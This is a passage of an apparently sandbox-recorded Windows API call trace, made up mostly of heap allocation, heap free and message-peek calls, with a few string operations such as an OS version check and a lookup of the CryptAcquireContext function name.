hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.967] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.967] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.967] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.968] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.970] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.970] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.972] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0206.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.973] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.973] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.973] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.974] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, 